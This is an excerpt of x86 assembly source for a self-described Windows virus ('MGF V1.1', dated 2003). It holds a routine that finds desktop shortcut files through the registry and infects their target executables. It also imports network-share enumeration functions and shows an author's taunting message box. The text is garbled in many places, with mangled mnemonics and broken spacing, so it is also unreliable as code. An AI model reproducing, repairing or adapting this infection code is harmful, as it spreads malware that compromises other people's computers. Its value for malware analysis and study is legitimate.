0SzFindClose DB' FindClose ', 0; Szuser32 DB' User32.dll ', 0SzMessageBoxa DB' MessageBoxa ', 0szADVAPI32 db 'ADVAPI32.dll', 0szRegCloseKey db 'RegCloseKey', 0szRegCreateKeyExA db 'RegCreateKeyExA', 0szRegOpenKeyExA db 'RegOpenKeyExA', 0szRegQueryValueExA db 'RegQueryValueExA', 0szRegSetValueExA db 'RegSetValueExA', 0szMPR db 'MPR.dll', 0szWNetAddConnectionA db 'WNetAddConnectionA ', 0SzwnetCancelConnectiona DB' WnetcancelConnectiona ', 0SzwnetCloseenum DB' WnetCloseenum ', 0SzwnetenumResourceA DB' WneetenumResourceA '
, 0szWNetOpenEnumA db 'WNetOpenEnumA', 0_EditLnkFile proc; infection desktop shortcut subroutine local @hFilelocal @hFileMaplocal @lpFileMaplocal @hFindFilelocal @dwFileSizelocal @dwBufferSizelocal @lpBuffer [80h]: bytelocal @ stWin32FindData: WIN32_FIND_DATApushad
Lea Eax, @ hfilepush eaxpush 1push 0le eax, szregkeydesktop [ebx] push eaxpush 80000001hcall dwregopenkeyex [ebx] .IF! EAX
Mov @ dwbuffersize, 80hle Eax, @ dwbuffersizepush eaxlea eax, @ lpbufferpush eaxpush 0 push 0le eax, szdesktopvalue [EBX] Push Eaxpush @HfileCall DwregQueryValueex [EBX]
Push @HfileCall dwregClosekey [EBX]
Dec @dwbuffersizelea edi, @ lpbufferadd edi, @ dwbuffersize.if byte PTR [EDI-1]! = '/' MOV Al, '/' Stosbinc @ dwbuffersize.endifmov Eax, 'NL. *' Stosdmov Eax, 'K'StosD
lea eax, @ stWin32FindDatapush eaxlea eax, @ lpBufferpush eaxcall dwFindFirstFile [ebx]; to find the first lnk file; invoke FindFirstFile, addr @ lpBuffer, addr @ stWin32FindData.if eax = INVALID_HANDLE_VALUEmov @ hFindFile, eax.repeat!
MOV EAX, DWORD PTR [@ stwin32finddata 20h] MOV @ dwfilesize, EAX
Mov ECX, @ dwbuffersizelea EDI, @ stwin32finddata 2chsub Edi, Ecxlea ESI, @ lpbufferpush EdiRep MovsBPOP EDI
Push 0push 80hpush 3push 0push 1push 80000000hpush edicall dwcreatefilea [EBX]; Invoke Createfile, EDI, 80000000H, 1, 0, 3, 80H, 0.IF EAX! = 0Ffffffffhmov @ Hfile, EAX
Push 0push 0push 0push 2push 0push Eaxcall dwcreatefilemapping [EBX]; Invoke CreateFilemapping, Eax, 0, 2, 0, 0.if Eaxmov @ HfileMap, EAX
Push 0push 0push 0push 4push Eaxcall dwmapviewoffile [EBX]; Invoke MapViewoffile, Eax, 4,0,0,0.if Eaxmov @ lpfilemap, EAX
Lea ESI, [EAX 65H] MOV EDI, ESIV ECX, @ dwfilesizesub ECX, 66H @@: incovush ESIPUSH EDIPUSH ECXMOV ECX, 3REPZ CMPSB; Copy * Path in the exe file in the * .lnk file pop ECXPOP EDIPOP EsiloPnz @B. ? if ZERO && byte ptr [edi 3] mov esi, edisub edi, @ lpFileMapmov ecx, @ dwFileSizesub ecx, edilea edi, @ stWin32FindDatapush edi @@: lodsbstosbor al, alloopnz @bpop edimov eax, [edi 2] and eax 0DFDFDFDFH.IF EAX == 'niw /' xor edi, edi.else.if! Dwversion [ebx] && eax == 'ORP /' XOR EDI, EDI.Endif.Endif
.ELSEXOR EDI, EDI.ENDIF
Push @lpfilemapcall dwunmapViewoffile [EBX]; Invoke UnmapViewoffile, @ lpfilemap.endif
Push @HfilemapCall dwclosehandle [EBX]; Invoke CloseHandle, @ hfilemap.endif
Push @HfileCall DWCloseHandle [EBX]; Invoke CloseHandle, @ hfile.endif
. IF Edipush 7Push Edicall_Editfile; eligible, infected. Nendif
lea eax, @ stWin32FindDatapush eaxpush @hFindFilecall dwFindNextFile [ebx]; to continue the search lnk files; invoke FindNextFile, @ hFindFile, addr @ stWin32FindData.until eax == 0push @hFindFilecall dwFindClose [ebx]; invoke FindClose, @ hFindFile.endif
.endif
POPADRET_EDITLNKFILE ENDPSZREGKEYDESKTOP DB 'Software / Microsoft / Windows / CurrentVersion / Explorer / Shell Folders', 0SzdesktopValue DB 'Desktop', 0
SzmessageTit DB 'Mo Guofeng's Declaration', 0SzMessageText DB 'This makers come to the dissemination technology. I have no destruction, you don't have to worry! ', 13, 10db' 我 我 比. Gates: Your fools, despise my vulnerability report, you should play their PP! ', 0
Szver DB 'Name: MGF V1.1', 0Address db '(c) nn.cn (p) 2003-10-08', 0EMAIL DB 'WOHOO2002 @ Hotmail.com', 0
FileHead DB 120H DUP (255); virus PE header, use of viruses, need to manually fill, only reserve space
ImportDirItem:; import table, it is not 2000 / XP / 2003 perform load rejection, to be dd offset FirstThunk0-400000hdd 0dd 0dd offset szKernel32-400000hdd offset FirstThunk1-400000hdd 5 dup (0) FirstThunk0: dd offset szFunctionName-400000hdd 0
Firstthunk1: DD Offset SZFUNCTIONNAME-400000HDD 0
SZFunctionName: DW 75HDB 'EXITPROCESS', 0, 0, 0
Virusend: End VirusStart